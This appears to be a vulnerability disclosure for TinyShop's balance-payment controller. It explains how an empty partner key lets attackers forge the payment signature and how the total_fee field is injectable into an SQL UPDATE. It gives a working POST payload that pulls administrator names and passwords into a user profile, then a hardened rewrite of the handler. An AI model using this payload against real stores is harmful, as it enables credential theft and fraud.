### Brief description:
20140926
### Details:
Since this is a payment flow it looks up the order status, so an order has to be created first.
The `total_fee` variable in the `pay_balance` function of /protected/controllers/payment.php:
```php
// Balance payment method, server-side handling
public function pay_balance(){
    $sign = Req::post('sign');              // sign is taken from the POST body
    $args = Req::post();
    unset($args['sign']);
    $total_fee = Req::post('total_fee');    // taken straight from POST
    $attach = Filter::int(Req::post('attach'));
    $return['attach'] = Req::post('attach');
    $return['total_fee'] = floatval(Req::post('total_fee'));
    $return['order_no'] = Req::post('order_no');
    $return['return_url'] = Req::post('return_url');
    // ...
    if(floatval($return['total_fee']) < 0 || $return['order_no'] == '' || $return['return_url'] == '')
    {
        $msg = array('type'=>'fail','msg'=>'支付参数不正确!');
        $this->redirect('/index/msg',false,$msg);
    }
    else{ // order looks fine, start the payment
        $payment = new Payment($attach);           // when attach is empty, $payment is empty too
        $paymentInfo = $payment->getPayment();     // paymentInfo is empty
        $pay_balance = new pay_balance();
        $filter_param = $pay_balance->filterParam($args);
        // sort the parameters that are to be signed
        $para_sort = $pay_balance->argSort($filter_param);
        $mysign = $pay_balance->buildSign($para_sort,$paymentInfo['partner_key']); // $paymentInfo['partner_key'] is empty as well, so whatever key is in the database no longer matters; it is simply not used
        if($mysign == $sign) // sign comes from POST, so the check is bypassed
        {
            $user_id = $this->user['id'];
            $model = new Model("customer");
            $customer = $model->where("user_id=".$user_id)->find();
            if($customer['balance']>=$total_fee){
                $order = $model->table("order")->where("order_no='".Filter::sql($return['order_no'])."' and user_id=".$user_id)->find();
                if($order){
                    if($order['pay_status']==0){
                        $flag = $model->table("customer")->where("user_id=".$user_id)->data(array('balance'=>"`balance`-".$total_fee))->update(); // total_fee goes straight into the query
                        $return['order_status'] = 'TINY_SECCESS';
                        // ...
```
```php
public function buildSign($sort_para,$key,$sign_type = "MD5")
{   // join every array element as "param=value" with "&" into one string
    $prestr = $this->createLinkstring($sort_para);
    // then append the security key directly to the joined string
    $prestr = $prestr.$key; // key is empty
    $mysgin = md5($prestr);
    return $mysgin;
}
```
So the key is ineffective as well; I did not trace it any further. We just set up a proxy that generates the sign for us.
### Proof of vulnerability:
```
url=http%3A%2f%2f127.0.0.1%2findex.php%3Fcon%3Dpayment%26act%3Dpay_balance
order_no=20141108134136569665&return_url=111&total_fee=12.00 , `real_name`=(SELECT concat(name,0x5f,password) from tiny_manager)
```
![QQ截图20141108134331.png](https://images.seebug.org/upload/201411/081344147814e835ae4b7416dbe0dde698cdb209.png)
The 404 is because return_url=111.
![QQ截图20141108134358.png](https://images.seebug.org/upload/201411/08134425ffc52e91dc77b716c522b89de40b7a96.png)
The injected result was written into the user's profile.
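A hardened version of the balance update, added here as an example and not TinyShop's own code. It assumes a PDO connection, the `customer` and `order` tables named above, and a hypothetical `total_fee` column on `order` holding the server-side amount; the signing scheme mirrors the one `buildSign` describes (sorted `k=v` pairs joined by `&`, key appended, MD5).

```php
<?php
// Same signing scheme as the report describes, but the key must be non-empty.
function buildSignHardened(array $args, string $partnerKey): string
{
    unset($args['sign']);
    ksort($args);
    $pairs = [];
    foreach ($args as $k => $v) {
        $pairs[] = $k . '=' . $v;
    }
    return md5(implode('&', $pairs) . $partnerKey);
}

function payBalanceHardened(PDO $pdo, int $userId, array $post, ?string $partnerKey): array
{
    // 1. An empty partner key lets a client compute a valid sign itself: refuse it.
    if ($partnerKey === null || $partnerKey === '') {
        return ['type' => 'fail', 'msg' => 'payment method not configured'];
    }
    $sign = (string)($post['sign'] ?? '');
    if (!hash_equals(buildSignHardened($post, $partnerKey), $sign)) {
        return ['type' => 'fail', 'msg' => 'bad signature'];
    }
    // 2. Do not trust the client's total_fee: the amount comes from the order row
    //    (hypothetical `order`.`total_fee` column), fetched with a prepared statement.
    $orderNo = (string)($post['order_no'] ?? '');
    $stmt = $pdo->prepare('SELECT total_fee, pay_status FROM `order` WHERE order_no = ? AND user_id = ?');
    $stmt->execute([$orderNo, $userId]);
    $order = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$order || (int)$order['pay_status'] !== 0) {
        return ['type' => 'fail', 'msg' => 'order not payable'];
    }
    $fee = (float)$order['total_fee'];
    // 3. Bind the amount as a parameter and let the database enforce the balance
    //    check atomically instead of interpolating "`balance`-" . $total_fee.
    $pdo->beginTransaction();
    $upd = $pdo->prepare('UPDATE customer SET balance = balance - :fee WHERE user_id = :uid AND balance >= :min');
    $upd->execute([':fee' => $fee, ':uid' => $userId, ':min' => $fee]);
    if ($upd->rowCount() !== 1) {
        $pdo->rollBack();
        return ['type' => 'fail', 'msg' => 'insufficient balance'];
    }
    $pdo->prepare('UPDATE `order` SET pay_status = 1 WHERE order_no = ? AND user_id = ?')
        ->execute([$orderNo, $userId]);
    $pdo->commit();
    return ['type' => 'success', 'order_no' => $orderNo];
}
```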